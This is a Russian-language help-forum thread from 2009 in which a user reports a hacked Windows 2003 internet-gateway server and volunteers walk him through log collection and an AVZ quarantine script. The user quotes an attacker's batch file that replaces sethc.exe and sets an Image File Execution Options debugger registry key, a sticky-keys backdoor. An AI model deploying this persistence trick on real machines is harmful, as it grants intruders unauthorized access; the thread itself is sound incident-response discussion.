мой серевр инета взломали

Printable View

19.08.2009, 15:34
wisen

Вложений: 1

мой серевр инета взломали

у меня по ходу мой серевр инета взломали, который раздает инет на пару десятков компов
Windows 2003, UserGate 2.8, RAdmin 2.1.
щас проверяю антивирусом cureit
нашло заразу у нового пользователя windows first(я его не создавал)

в каталоге пользователя first лежит батник 1.bat и файл 222.exe
текст батника:
copy 222.exe %systemroot%\system32\dllcache\sethc.exe & copy 222.exe %systemroot%\system32\sethc.exe & copy 222.exe %systemroot%\Cluster\222.exe
echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] >>1.reg
echo "debugger"="c:\\windows\\Cluster\\222.exe" >>1.reg

regedit /s 1.reg
del 1.reg

а также в каталоге пользователя C:\Documents and Settings\First\
rad.exe (Program.RemoteAdmin Контейнер содержит инфицированные объекты) - cureit его переместил

Посмотрите лог. Что там желательно сделать чтобы улучшить безопасность?
19.08.2009, 16:27
Rene-gad

Мы будем Вам очень признательны, если Вы прочтёте и [B]в точности выполните[/B] наши несложные [URL="http://virusinfo.info/showthread.php?t=1235"]правила[/URL].
В противном случае мы никак не сможем быть Вам полезны.
19.08.2009, 16:47
wisen

я прочел
HiJackThis ничего не нашел, так как на этом компе в инет через браузер не выхожу
sysecure.htm как две капли похож на ssyscheck.htm
19.08.2009, 17:09
Гриша

Сказали в морг, значит в морг :) делайте как положено....
19.08.2009, 17:18
wisen

просто не охота перезагружать комп после проверки авз-ом еще раз
работают люди
19.08.2009, 22:17
Rene-gad

[QUOTE=wisen;451901]просто не охота перезагружать комп после проверки авз-ом еще раз
[/QUOTE]В процессе лечения обязательно придется перегружаться, причем неоднократно.
Найдите возможность, выполнить правила, если хотите, чтобы Вам помогли вылечить систему.
19.08.2009, 23:06
wisen

Вложений: 3

Сделал все логи.
19.08.2009, 23:52
thyrex

Выполните скрипт в AVZ
[code]begin
QuarantineFile('C:\WINDOWS\system32\umxw.dll','');
QuarantineFile('C:\WINDOWS\system32\umxtrw.dll','');
QuarantineFile('C:\WINDOWS\system32\umxexw.dll','');
end. [/code]

Пришлите карантин согласно [B]Приложения 3[/B] правил по красной ссылке [COLOR="Red"][U][B]Прислать запрошенный карантин[/B][/U][/COLOR] вверху темы
20.08.2009, 09:38
wisen

скрипт сделал
20.08.2009, 12:03
Rene-gad

[QUOTE=wisen;452251]скрипт сделал[/QUOTE]
Карантин загрузите как написано в сообщении thyrex и никак иначе.
20.08.2009, 13:51
wisen

какантин загрузил
21.08.2009, 13:51
CyberHelper

Итог лечения

Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]3[/B][*]В ходе лечения вредоносные программы в карантинах не обнаружены[/LIST]